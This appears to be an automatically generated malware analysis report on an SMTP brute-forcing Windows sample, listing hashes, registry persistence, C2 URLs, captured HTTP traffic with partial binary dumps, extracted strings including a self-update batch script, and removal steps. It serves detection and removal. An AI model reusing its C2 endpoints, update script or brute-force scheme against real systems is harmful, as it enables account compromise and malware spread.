Sample_ebb4f8b43f

by malwarelabrobot on September 4th, 2017 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: ebb4f8b43fb78610e9757cf16387454a
SHA1: 7231881b7dc2194d6989184833f86484d1df15e7
SHA256: e8e4251f0f5abe9ca7a0bd10bd1fca9066fc93e17756423a6ea694ecfb8748c4
SSDeep: 6144:6zg1Uk NeeeeeeenI5CXT6BSHuoazrpPkf3CRrnpDq:6JNeeeeeeenI5Cj/gZkf3CRrx
Size: 279552 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2012-07-26 17:06:56
Analyzed on: Windows7 SP1 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):
No processes have been created.
The Malware injects its code into the following process(es):

%original file name%.exe:2928

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2928 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\libeay32.dll (50 bytes)
C:\ssleay32.dll (540 bytes)

Registry activity

The process %original file name%.exe:2928 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ebb4f8b43fb78610e9757cf16387454a" = "c:\%original file name%.exe"

Dropped PE files

MD5 File path
7a94e62ad54c62ecad385fddafe04304 c:\libeay32.dll
e0cd0800a00d51025968d778d0e6b2b3 c:\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 48228 48640 3.64813 42ccae78c14a9a31b0195dce0871b3b8
.rdata 53248 5760 6144 1.29267 47168d3682d1f082ae127bde4ea008dc
.data 61440 35282 35328 5.33302 c2a3e79f9c622879bc17d606f4fe97a2
.rsrc 98304 356352 188416 5.18231 b90400af3281643c7760deb989c89c23

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://hey.justsimpledomain.com/cmd
hxxp://hey.justsimpledomain.com/download/libeay32.dll
hxxp://hey.justsimpledomain.com/download/ssleay32.dll
smtp.googlemail.com 74.125.206.16


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /cmd HTTP/1.0
Host: hey.justsimpledomain.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

status=0
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Sep 2017 09:11:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.30
Cache-Control: no-cache
Set-Cookie: XSRF-TOKEN=eyJpdiI6ImoyRGdLWXRuMjZLVERPM25JUng0MWc9PSIsInZhbHVlIjoiY0l1Q1B0TW1YMVBzS0NxS0VycnI4dlU2VmRTM3NpelIxb0VNTENtS0tcL1N3bk1WR3ViZlZSRUJLQldsbmcrZWVVRUhjME9cL3dqaUVMdE9rQUlcLzJUaUE9PSIsIm1hYyI6IjU4ZDQ3OGZkNTAzMTk2ODJhOGM4MjhjNzk1ZDcwMzJlMzlkMzc4OGQyMzBmN2Q3NDczMzBiN2YyODAyZTVhY2UifQ==; expires=Sun, 03-Sep-2017 11:11:42 GMT; Max-Age=7200; path=/
Set-Cookie: laravel_session=eyJpdiI6IjhyYUhYN3N4RXZ0R2pLYVNSSzhObHc9PSIsInZhbHVlIjoidVNoMGV2YUNNVHQ2VzMwd3RLaXJZRU5EQWFGMmxzdlwvbDRKUWlJZVV1cFloUjZpMzl0MlVMcjVybXh2VTZJZjJOUkVNdU1hZHQ5V1hIUjZDb296Z1ZBPT0iLCJtYWMiOiI5OTk2OGQ3NjE2N2MwM2U5Mjg0OGE0MzAxZjA0NWYzOWM1NWVkNTEyYTdlYWFjOGNjYmJiNWVkZGJjZjlkMGU5In0=; expires=Sun, 03-Sep-2017 11:11:42 GMT; Max-Age=7200; path=/; httponly


GET /download/ssleay32.dll HTTP/1.0
Host: hey.justsimpledomain.com
Keep-Alive: 300
Connection: keep-alive
Cookie: XSRF-TOKEN=eyJpdiI6InJUVnNrUjlJTGdPNUVpRkdsSUc4RkE9PSIsInZhbHVlIjoiQnJHcWoyYVlwUmlwSjJHc1wvcFZQSGpJXC80UHdlNlFLb0Vmd2R3Nit6MTZNOWpqaWdYakZQOVB6Q0p6R0E1Q09IXC8yUm1vdTBRQmdrRmQxdnFpNXpVUVE9PSIsIm1hYyI6Ijc2NTU2MTQ1MWNjNDZlYTIxODIyZmRkNDc1N2UxY2NkNzVlMmRiMjIzNjUwMjk3YTFhZDIzYTlkYjg1ZDA1OTcifQ==; laravel_session=eyJpdiI6IjJFN3lKK2RFeVJncCt1R1BpaU5zbGc9PSIsInZhbHVlIjoidjE0NnZsZnZWejZISEdGKzJBZzhzdFNNOEhnS0hUSTVGYURneFwvdE9jM2luUGtUN1JOSExtSTJqWWVrUHV4OExFckZISzhCMVwvSlwvVm9NcDNWaWdkdHc9PSIsIm1hYyI6Ijg2YTBjMTBlNTRlMzkyZjEzYjhjMjYxM2VlYTU2ZTUxMmE1NzMyMzkzZmVmZGZhODUzY2ZiNzUyZjU0ZWQ1ZDQifQ==
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Sep 2017 09:11:45 GMT
Content-Type: application/x-dosexec
Content-Length: 270336
Connection: keep-alive
X-Powered-By: PHP/5.6.30
Cache-Control: public
Last-Modified: Sun, 09 Jul 2017 00:26:18 GMT
Content-Disposition: attachment; filename="ssleay32.dll"
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6IlpoN3lXTGF1YlUxYTBhYlk4Znhkd1E9PSIsInZhbHVlIjoiUkxqWHJ0Y0g5VDA4b0FhRTRRSlBZd0t4SFpZSVFDbVpFaUVRRjRSYTc2VWxvR1FGXC9yTnh0R0lwR2JkYk9CV1BzWnlzUzlDZFFjbnlHR1VMdXZQOHdBPT0iLCJtYWMiOiJjNjhhYzAxYzc0NjgwNTUwNzIzMGU2ZWRmMDY2MmQ0ZWY5ZjQ5MDc5YjcxNTVjZGRlNjJhZGFjYTIzMDc3ZmYyIn0=; expires=Sun, 03-Sep-2017 11:11:44 GMT; Max-Age=7200; path=/
Set-Cookie: laravel_session=eyJpdiI6ImFjMk5DRFVaRDN5ZXczaWduNVJhc3c9PSIsInZhbHVlIjoiaGJZVVBHV3pZbEt6YXZUd29HelUwVVAxdUU5dG9IUU9kYkxrb2kwb1VXcEhPWW5yekhZaVFqcWRvbnYySWd4S3U0N3pUaHNHeEN1K1UzT1k4MUxxWHc9PSIsIm1hYyI6ImQ5NGE2NTgxYTU2MTYxMTdkOGVlN2M4MmM5ODlkNjYyNzJjNTBmODIxMzI1YmY0MzZmNDY3OWVmZmQxOWU3YWYifQ==; expires=Sun, 03-Sep-2017 11:11:44 GMT; Max-Age=7200; path=/; httponly
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........y4.D.Z.D.Z.
D.Z.M`..G.Z.M`..F.Z.M`..C.Z.D.[...Z.M`..y.Z.M`..E.Z.M`..E.Z.M`..E.Z.Ri
chD.Z.........................PE..L.....DS...........!................
......... ...............................`......R.....................
..............p$..L...P.... .......................0..|#..0&..........
....................(...@............ ...............................t
ext............................... ..`.rdata..@.... ..................
....@..@.data....1..........................@....rsrc........ ........
..............@..@.reloc..~$...0...&..................@..B............
......................................................................
......................................................................
......................................................................
......................................................................
............................................3..|$.....H%P&............
.......P&.............3..|$.....H%.&.............................~4. .
... ..u............F4.N<W.y.9F4.......FD..... .R..PV.g>....... N
D...;.}.PjjV..?....._Y..FD......G...tP....t)j.V.<2..h(...h<'..h.
...jjj............_Y.h ...h<'..h....jjj............_Y......O.......
..;.}........W..NT.............G...W..NT................G...W..NT.....
....Ad......wX.F4. ...FT.V<............S.Z..PdU.l.....?..vTj.V.d1..
hC...h<'..h(...jjj..,......][..._Y.j.V.91..h7...h<'..h....jj

<<< skipped >>>

GET /download/libeay32.dll HTTP/1.0
Host: hey.justsimpledomain.com
Keep-Alive: 300
Connection: keep-alive
Cookie: XSRF-TOKEN=eyJpdiI6ImoyRGdLWXRuMjZLVERPM25JUng0MWc9PSIsInZhbHVlIjoiY0l1Q1B0TW1YMVBzS0NxS0VycnI4dlU2VmRTM3NpelIxb0VNTENtS0tcL1N3bk1WR3ViZlZSRUJLQldsbmcrZWVVRUhjME9cL3dqaUVMdE9rQUlcLzJUaUE9PSIsIm1hYyI6IjU4ZDQ3OGZkNTAzMTk2ODJhOGM4MjhjNzk1ZDcwMzJlMzlkMzc4OGQyMzBmN2Q3NDczMzBiN2YyODAyZTVhY2UifQ==; laravel_session=eyJpdiI6IjhyYUhYN3N4RXZ0R2pLYVNSSzhObHc9PSIsInZhbHVlIjoidVNoMGV2YUNNVHQ2VzMwd3RLaXJZRU5EQWFGMmxzdlwvbDRKUWlJZVV1cFloUjZpMzl0MlVMcjVybXh2VTZJZjJOUkVNdU1hZHQ5V1hIUjZDb296Z1ZBPT0iLCJtYWMiOiI5OTk2OGQ3NjE2N2MwM2U5Mjg0OGE0MzAxZjA0NWYzOWM1NWVkNTEyYTdlYWFjOGNjYmJiNWVkZGJjZjlkMGU5In0=
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Sep 2017 09:11:43 GMT
Content-Type: application/x-dosexec
Content-Length: 1177088
Connection: keep-alive
X-Powered-By: PHP/5.6.30
Cache-Control: public
Last-Modified: Sun, 09 Jul 2017 00:26:18 GMT
Content-Disposition: attachment; filename="libeay32.dll"
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InJUVnNrUjlJTGdPNUVpRkdsSUc4RkE9PSIsInZhbHVlIjoiQnJHcWoyYVlwUmlwSjJHc1wvcFZQSGpJXC80UHdlNlFLb0Vmd2R3Nit6MTZNOWpqaWdYakZQOVB6Q0p6R0E1Q09IXC8yUm1vdTBRQmdrRmQxdnFpNXpVUVE9PSIsIm1hYyI6Ijc2NTU2MTQ1MWNjNDZlYTIxODIyZmRkNDc1N2UxY2NkNzVlMmRiMjIzNjUwMjk3YTFhZDIzYTlkYjg1ZDA1OTcifQ==; expires=Sun, 03-Sep-2017 11:11:43 GMT; Max-Age=7200; path=/
Set-Cookie: laravel_session=eyJpdiI6IjJFN3lKK2RFeVJncCt1R1BpaU5zbGc9PSIsInZhbHVlIjoidjE0NnZsZnZWejZISEdGKzJBZzhzdFNNOEhnS0hUSTVGYURneFwvdE9jM2luUGtUN1JOSExtSTJqWWVrUHV4OExFckZISzhCMVwvSlwvVm9NcDNWaWdkdHc9PSIsIm1hYyI6Ijg2YTBjMTBlNTRlMzkyZjEzYjhjMjYxM2VlYTU2ZTUxMmE1NzMyMzkzZmVmZGZhODUzY2ZiNzUyZjU0ZWQ1ZDQifQ==; expires=Sun, 03-Sep-2017 11:11:43 GMT; Max-Age=7200; path=/; httponly
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........XE..9 ..9 .
.9 ..A...9 ..A...9 ..9*..9 ..A...9 ..9 ..9 ..A...; ..A...9 ..A...9 ..A
...9 .Rich.9 .........................PE..L.....DS...........!........
........,........................................P....................
...................b..Q....W..................................l.......
.............................V..@.....................................
.......text............................... ..`.rdata..................
............@..@.data............^..................@....rsrc.........
.......R..............@..@.reloc...............Z..............@..B....
......................................................................
......................................................................
......................................................................
......................................................................
............................................hhl..h.....a......j.......
............&....D$.SU.l$.VWUPh ...h....hhl...D$$............hl....l..
..............f.......uVP........uF..........................S........
C..K....l.......S..D$..L$._^...][Y...l....l.....;.t....l..........h...
.P........uL.........................K.f.......S........C..D$.f.K..L$.
_.5.l...S.^...][Y.....u9..........................C..D$..K..L$._.5.l..
.S.^...][Y...l......l..;(.......u..D$..T$._^...][Y..T$..D$._^...][Y...
..j.h.....T.......%...............j.h.....4.......%...............

<<< skipped >>>

The Malware connects to the servers at the following location(s):

%original file name%.exe_2928:

`.rsrc
Ca.in
d.MThe
TArray<System.Byte>
TArray<System.Char>
System.Types
!"#$%&'(!)* ,-./0'
* ,-./01234
System.SysUtils
ENoMonitorSupportException
TFormatSettings.TEraInfo
TArray<System.string>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
System.SysUtilsL
&TArray<System.SysUtils.TUnitHashEntry>
Uh.AB
iMaxUdpDg
sin_port
sin6_port
0.0.0.0
127.0.0.1
255.255.255.255
getservbyport
THookVerifyCert
LT_SSHv2
Port
ResolvePort
GetLocalSinPort
GetRemoteSinPort
FSocksPort
FSocksPassword
FSocksResponsePort
FSocksLocalPort
FSocksRemotePort
FBypassFlag
SocksPort
SocksPassword
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnel
TUDPBlockSocket'
TUDPBlockSocket
FOnVerifyCert
FKeyPassword
FCertificateFile
FPrivateKeyFile
FCertificate
FPrivateKey
FCertCA
FCertCAFile
FTrustCertificate
FTrustCertificateFile
FVerifyCert
FPassword
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg2
FCertComplianceLevel
GetCertInfo
GetVerifyCert
KeyPassword
Password
CertificateFile
PrivateKeyFile(
Certificate(
PrivateKey(
TrustCertificateFile(
TrustCertificate(
CertCA
CertCAFile
VerifyCert
SSHChannelType
SSHChannelArg1
SSHChannelArg2
CertComplianceLevelT
OnVerifyCert
FTargetPort
TargetPort
httpsendex
FAlivePort
FProxyPort
FProxyPass
FAddPortNumberToHost
THTTPSend,
HTTPMethod
THTTPSend(9C
ProxyPort
ProxyPass
AddPortNumberToHost
FESMTPcap
FESMTP
FESMTPSize
FFirstMsg
TSMTPSend&
Login
TSMTPSend
smtpsendex
ESMTPcap
ESMTP
ESMTPSize
FirstMsg
AUTH LOGIN
FSMTPSend
FHTTP
TMessHeader&
TMessHeader<
TMessHeaderClass
GetAdditionalSmtp
FTCPSock
FUseTCP
TCPSock
UseTCP
.in-addr.arpa
.ip6.arpa
FSMTP
SMTP
smtp=
FCmdEvent
FLastCmdDate
FLastCmdDateCS
FCmdParams
TCmdGet?
TCmdGetH
cmdget
LastCmdDate
System.RTLConsts
System.SysConst
System.Internal.ExcUtils
System.Character
Winapi.Windows
System.UITypes
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.StrUtils
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.Messages
Winapi.WinSock
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
Z%T%i%f%`%P%l%
DBv}.BvsuAv{ Bv
kernel32.dll
user32.dll
Silent_SMTP_Bruter.exe
Embarcadero Delphi for Win32 compiler version 30.0 (23.0.20618.2753)
Silent_SMTP_Bruter
dSystem.SysConst
ISystem.Internal.ExcUtils
,System.Character
kWinapi.PsAPI
-Winapi.ImageHlp
System.StrUtils
"Winapi.WinSock
GetCPInfoExW
GetCPInfo
RegOpenKeyExW
RegCloseKey
ShellExecuteW
.text
`.itext
`.data
.idata
.didata
.edata
@.tls
.rdata
@.rsrc
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%
b%c%d%e%f%g%h%i%j%k%l%VB 
(32.dll
.20618753)
KERNEL32.DLL
advapi32.dll
netapi32.dll
oleaut32.dll
shell32.dll
version.dll
%s, %d %s %s %s
HTTPS
%d.%d.%d.%d
ws2_32.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation now in progress
Operation already in progress
Socket operation on nonsocket
Protocol not supported
Socket not supported
Operation not supported on Socket
Protocol family not supported
Address family not supported
Winsock DLL cannot support this application
0.0.0.1
HTTP/1.0
HTTP/
SSL/TLS support is not compiled!
Without SSL support
Mozilla/4.0 (compatible; Synapse)
HTTP/
LOGIN
smtp.­dr%
smtp://
application/x-www-form-urlencoded
iconv.dll
KAMENICKY
[pass]
IPHLPAPI.DLL
System\CurrentControlSet\Services\Tcpip\Parameters\Temporary
System\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\MSTCP
Synapse - Pascal TCP/IP library by Lukas Gebauer
login failed :
smtp.googlemail.com
cmd/emails
cmd/smtp
cmd/limit-smtp
smtpcheckres
login.txt
cmd/verify-emails
ssleay32.dll
libssl32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
RSA_generate_key
i2d_PrivateKey_bio
DES_set_key_checked
status=%s
download/libeay32.dll
download/ssleay32.dll
upd.tmp
upd.bat
set fl="%s"
del /q %%fl%%
if exist %%fl%% goto dl
move /y "%s" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
US-ASCII ANSI_X3.4-1968 ANSI_X3.4-1986 ASCII CP367 IBM367 ISO-IR-6 ISO646-US ISO_646.IRV:1991 US CSASCII USASCII ISOIR6
WINDOWS-1250 CP1250 MS-EE WINDOWS1250 MSEE
WINDOWS-1251 CP1251 MS-CYRL WINDOWS1251 MSCYRL
WINDOWS-1252 CP1252 MS-ANSI WINDOWS1252 MSANSI
WINDOWS-1253 CP1253 MS-GREEK WINDOWS1253 MSGREEK
WINDOWS-1254 CP1254 MS-TURK WINDOWS1254 MSTURK
WINDOWS-1255 CP1255 MS-HEBR WINDOWS1255 MSHEBR
WINDOWS-1256 CP1256 MS-ARAB WINDOWS1256 MSARAB
WINDOWS-1257 CP1257 WINBALTRIM WINDOWS1257
WINDOWS-1258 CP1258 WINDOWS1258
CP874 WINDOWS-874 WINDOWS874
SHIFT-JIS MS_KANJI SHIFT_JIS SJIS CSSHIFTJIS SHIFTJIS
Advapi32.dll
Windows
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows Server 2012
Windows Server 2012 R2
Windows 8
Windows 8.1
Windows 10
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s List capacity out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s.Seek not implemented
Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d The specified file was not found"%s (Version %d.%d, Build %d, %5:s):%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)
Start index out of bounds (%d)
Invalid count (%d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
'%s' is not a valid time '%d.%d' is not a valid timestamp
I/O error %d
Integer overflow Invalid floating point operation

%original file name%.exe_2928_rwx_00401000_0006D000:

TArray<System.Byte>
TArray<System.Char>
System.Types
!"#$%&'(!)* ,-./0'
* ,-./01234
System.SysUtils
ENoMonitorSupportException
TFormatSettings.TEraInfo
TArray<System.string>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
System.SysUtilsL
&TArray<System.SysUtils.TUnitHashEntry>
Uh.AB
iMaxUdpDg
sin_port
sin6_port
0.0.0.0
127.0.0.1
255.255.255.255
getservbyport
THookVerifyCert
LT_SSHv2
Port
ResolvePort
GetLocalSinPort
GetRemoteSinPort
FSocksPort
FSocksPassword
FSocksResponsePort
FSocksLocalPort
FSocksRemotePort
FBypassFlag
SocksPort
SocksPassword
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnel
TUDPBlockSocket'
TUDPBlockSocket
FOnVerifyCert
FKeyPassword
FCertificateFile
FPrivateKeyFile
FCertificate
FPrivateKey
FCertCA
FCertCAFile
FTrustCertificate
FTrustCertificateFile
FVerifyCert
FPassword
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg2
FCertComplianceLevel
GetCertInfo
GetVerifyCert
KeyPassword
Password
CertificateFile
PrivateKeyFile(
Certificate(
PrivateKey(
TrustCertificateFile(
TrustCertificate(
CertCA
CertCAFile
VerifyCert
SSHChannelType
SSHChannelArg1
SSHChannelArg2
CertComplianceLevelT
OnVerifyCert
FTargetPort
TargetPort
httpsendex
FAlivePort
FProxyPort
FProxyPass
FAddPortNumberToHost
THTTPSend,
HTTPMethod
THTTPSend(9C
ProxyPort
ProxyPass
AddPortNumberToHost
FESMTPcap
FESMTP
FESMTPSize
FFirstMsg
TSMTPSend&
Login
TSMTPSend
smtpsendex
ESMTPcap
ESMTP
ESMTPSize
FirstMsg
AUTH LOGIN
FSMTPSend
FHTTP
TMessHeader&
TMessHeader<
TMessHeaderClass
GetAdditionalSmtp
FTCPSock
FUseTCP
TCPSock
UseTCP
.in-addr.arpa
.ip6.arpa
FSMTP
SMTP
smtp=
FCmdEvent
FLastCmdDate
FLastCmdDateCS
FCmdParams
TCmdGet?
TCmdGetH
cmdget
LastCmdDate
System.RTLConsts
System.SysConst
System.Internal.ExcUtils
System.Character
Winapi.Windows
System.UITypes
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.StrUtils
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.Messages
Winapi.WinSock
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
Z%T%i%f%`%P%l%
DBv}.BvsuAv{ Bv
kernel32.dll
user32.dll
Silent_SMTP_Bruter.exe
Embarcadero Delphi for Win32 compiler version 30.0 (23.0.20618.2753)
Silent_SMTP_Bruter
dSystem.SysConst
ISystem.Internal.ExcUtils
,System.Character
kWinapi.PsAPI
-Winapi.ImageHlp
System.StrUtils
"Winapi.WinSock
GetCPInfoExW
GetCPInfo
RegOpenKeyExW
RegCloseKey
ShellExecuteW
.text
`.itext
`.data
.idata
.didata
.edata
@.tls
.rdata
@.rsrc
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%
b%c%d%e%f%g%h%i%j%k%l%VB 
(32.dll
.20618753)
%s, %d %s %s %s
HTTPS
%d.%d.%d.%d
ws2_32.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation now in progress
Operation already in progress
Socket operation on nonsocket
Protocol not supported
Socket not supported
Operation not supported on Socket
Protocol family not supported
Address family not supported
Winsock DLL cannot support this application
0.0.0.1
HTTP/1.0
HTTP/
SSL/TLS support is not compiled!
Without SSL support
Mozilla/4.0 (compatible; Synapse)
HTTP/
LOGIN
smtp.­dr%
smtp://
application/x-www-form-urlencoded
iconv.dll
KAMENICKY
[pass]
IPHLPAPI.DLL
System\CurrentControlSet\Services\Tcpip\Parameters\Temporary
System\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\MSTCP
Synapse - Pascal TCP/IP library by Lukas Gebauer
login failed :
smtp.googlemail.com
cmd/emails
cmd/smtp
cmd/limit-smtp
smtpcheckres
login.txt
cmd/verify-emails
ssleay32.dll
libssl32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
RSA_generate_key
i2d_PrivateKey_bio
DES_set_key_checked
status=%s
download/libeay32.dll
download/ssleay32.dll
upd.tmp
upd.bat
set fl="%s"
del /q %%fl%%
if exist %%fl%% goto dl
move /y "%s" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
US-ASCII ANSI_X3.4-1968 ANSI_X3.4-1986 ASCII CP367 IBM367 ISO-IR-6 ISO646-US ISO_646.IRV:1991 US CSASCII USASCII ISOIR6
WINDOWS-1250 CP1250 MS-EE WINDOWS1250 MSEE
WINDOWS-1251 CP1251 MS-CYRL WINDOWS1251 MSCYRL
WINDOWS-1252 CP1252 MS-ANSI WINDOWS1252 MSANSI
WINDOWS-1253 CP1253 MS-GREEK WINDOWS1253 MSGREEK
WINDOWS-1254 CP1254 MS-TURK WINDOWS1254 MSTURK
WINDOWS-1255 CP1255 MS-HEBR WINDOWS1255 MSHEBR
WINDOWS-1256 CP1256 MS-ARAB WINDOWS1256 MSARAB
WINDOWS-1257 CP1257 WINBALTRIM WINDOWS1257
WINDOWS-1258 CP1258 WINDOWS1258
CP874 WINDOWS-874 WINDOWS874
SHIFT-JIS MS_KANJI SHIFT_JIS SJIS CSSHIFTJIS SHIFTJIS
Advapi32.dll
Windows
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows Server 2012
Windows Server 2012 R2
Windows 8
Windows 8.1
Windows 10
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s List capacity out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s.Seek not implemented
Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d The specified file was not found"%s (Version %d.%d, Build %d, %5:s):%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)
Start index out of bounds (%d)
Invalid count (%d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
'%s' is not a valid time '%d.%d' is not a valid timestamp
I/O error %d
Integer overflow Invalid floating point operation

%original file name%.exe_2928_rwx_00580000_00001000:

Kernel32.dll

%original file name%.exe_2928_rwx_005A0000_00001000:

Kernel32.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    C:\libeay32.dll (50 bytes)
    C:\ssleay32.dll (540 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "ebb4f8b43fb78610e9757cf16387454a" = "c:\%original file name%.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
